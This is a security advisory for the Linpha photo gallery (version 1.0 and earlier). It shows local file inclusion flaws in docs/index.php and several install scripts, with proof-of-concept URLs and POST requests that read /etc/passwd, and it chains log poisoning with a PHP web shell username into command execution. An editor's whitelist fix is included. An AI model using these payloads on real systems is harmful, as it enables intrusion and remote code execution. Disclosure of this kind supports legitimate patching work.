------------- Linpha <= 1.0 multiple arbitrary local file inclusion -----------------
i)
vulnerable code in docs/index.php at lines 28-41:
…
if(isset($_GET['lang'])) // come from install pages
{
$include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
include_once(TOP_DIR.'/functions/db_api.php');
$include_lang = get_language();
}
else
{
$include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
…
the lang value is concatenated into the include path without any validation, so you can include an arbitrary php file from local resources, poc:
http://[target]/[host]/docs/index.php?lang=/…/…/…/…/…/…/…/…/…/…/test
and, if magic_quotes_gpc = Off, any file (the %00 null byte truncates the path before the appended '.php' suffix):
http://[target]/[host]/docs/index.php?lang=/…/…/…/…/…/…/…/…/…/…/etc/passwd%00
ii) the install directory is not removed after installation; its scripts cannot be
used to modify settings, but they carry the same arbitrary local inclusion issue in several files:
--------------------------------------------------------------------------
ii.a) vulnerable code in install/install.php at lines 26-36:
…
if (@$_GET['language']) {
$lang=$_GET['language'];
} else if (@$_POST['language']) {
$lang=$_POST['language'];
} else if ($http_accept_lang) {
$lang = $http_accept_lang;
} else {
$lang="English";
}
include_once(TOP_DIR.'/lang/lang.'.$lang.'.php');
…
poc:
http://[target]/[path]/install/install.php?language=/…/…/…/…/…/…/…/test
if magic_quotes_gpc = Off:
http://[target]/[path]/install/install.php?language=/…/…/sql/tmp/linpha.log%00
--------------------------------------------------------------------------
ii.b) vulnerable code in install/sec_stage_install.php at lines 22-31:
…
switch($_GET['whatlang'])
{
case 1:
include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
break;
default:
include_once(TOP_DIR.'/lang/lang.English.php');
break;
}
…
poc:
http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language=/…/…/…/…/…/…/…/test
if magic_quotes_gpc = Off:
http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language=/…/…/…/…/…/…/…/etc/passwd%00
--------------------------------------------------------------------------
ii.c) vulnerable code in install/third_stage_install.php at line 22:
…
include_once(TOP_DIR.'/lang/lang.'.$_GET['language'].'.php');
…
poc:
http://[target]/[path]/install/third_stage_install.php?language=/…/…/…/…/…/…/…/test
if magic_quotes_gpc = Off:
http://[target]/[path]/install/third_stage_install.php?language=/…/…/…/…/…/…/…/etc/passwd%00
--------------------------------------------------------------------------
ii.d) vulnerable code in install/forth_stage_install.php at line 22:
…
include_once(TOP_DIR.'/lang/lang.'.$_POST['language'].'.php');
…
poc:
POST [path]/install/forth_stage_install.php HTTP/1.1
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close
language=/…/…/…/…/…/…/…/…/test
if magic_quotes_gpc = Off:
POST [path]/install/forth_stage_install.php HTTP/1.1
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: Sun-Tzu
Connection: Close
language=/…/…/…/…/…/…/…/…/etc/passwd%00
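Every issue in i) and ii) is the same defect: a request parameter is glued into the include path and the only thing standing between it and an arbitrary file is magic_quotes_gpc. The following is an added editor's example of the fix, not Linpha's own code: the language name is resolved against the list of lang.*.php files actually installed, so traversal sequences, absolute paths, null bytes and log files can never reach include_once(). It assumes the advisory's layout (TOP_DIR.'/lang/lang.<name>.php') and an "English" fallback; the constants, function names and the glob of the lang directory are the editor's assumptions.

```php
<?php
// Added example (editor's hardened version, not Linpha's code).
// Assumptions: this script lives in the Linpha top directory and the
// language files follow the advisory's naming TOP_DIR.'/lang/lang.<name>.php'.
define('TOP_DIR', __DIR__);
define('DEFAULT_LANG', 'English');   // assumption: fallback language name

/**
 * Return the language names that actually exist on disk.
 * Only the token between "lang." and ".php" is kept, restricted to
 * [A-Za-z0-9_], so the result can never contain "/", "\" or a NUL byte.
 */
function installed_languages(): array
{
    $langs = [];
    foreach (glob(TOP_DIR . '/lang/lang.*.php') ?: [] as $file) {
        if (preg_match('/^lang\.([A-Za-z0-9_]+)\.php$/', basename($file), $m)) {
            $langs[] = $m[1];
        }
    }
    return $langs;
}

/**
 * Map the untrusted request value to a known language name.
 * Anything that is not exactly one of the installed names (../ sequences,
 * "%00", "/etc/passwd", "sql/tmp/linpha.log") falls back to the default.
 */
function resolve_language(?string $requested, array $installed): string
{
    if ($requested !== null && in_array($requested, $installed, true)) {
        return $requested;
    }
    if (in_array(DEFAULT_LANG, $installed, true)) {
        return DEFAULT_LANG;
    }
    // No usable language shipped: fail closed rather than include something else.
    throw new RuntimeException('no language file available');
}

/**
 * Drop-in replacement for the include_once() lines quoted in the advisory.
 * Returns the language that was actually loaded.
 */
function include_language_file(?string $requested): string
{
    $lang = resolve_language($requested, installed_languages());
    // $lang is a whitelisted token, so this path is always one of the shipped files.
    include_once TOP_DIR . '/lang/lang.' . $lang . '.php';
    return $lang;
}

// Same call sites as docs/index.php and install/*.php, GET or POST:
// $lang = include_language_file($_GET['lang'] ?? $_POST['language'] ?? null);
```

The check is an exact-match whitelist, not a blacklist of "../" or "%00": it stays correct whatever the PHP version or magic_quotes_gpc setting (the directive was removed in PHP 5.4 anyway), and it does not need to know how the attacker encodes the path.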
iii) if "user login events log" is set to "file" in Linpha administration
(not the default), a remote user can inject arbitrary code into sql/tmp/linpha.log, because the submitted username is written to the log verbatim
poc: try to login with username: <?php system($_GET[cmd]);?>
and password: [whatever]
now in sql/tmp/linpha.log we have something like this:
USER | ERROR | 20060211 035519 | 192.168.1.5 | User <?php system($_GET[cmd]);?>: login failed!
now, if magic_quotes_gpc = Off on the target system, the log file can be pulled in through the lang inclusion from i) and the injected php runs operating system
commands, poc:
http://[target]/[path]/docs/index.php?cmd=ls%20-la&lang=/…/…/sql/tmp/linpha.log%00
(same technique with install dir scripts…)
rgod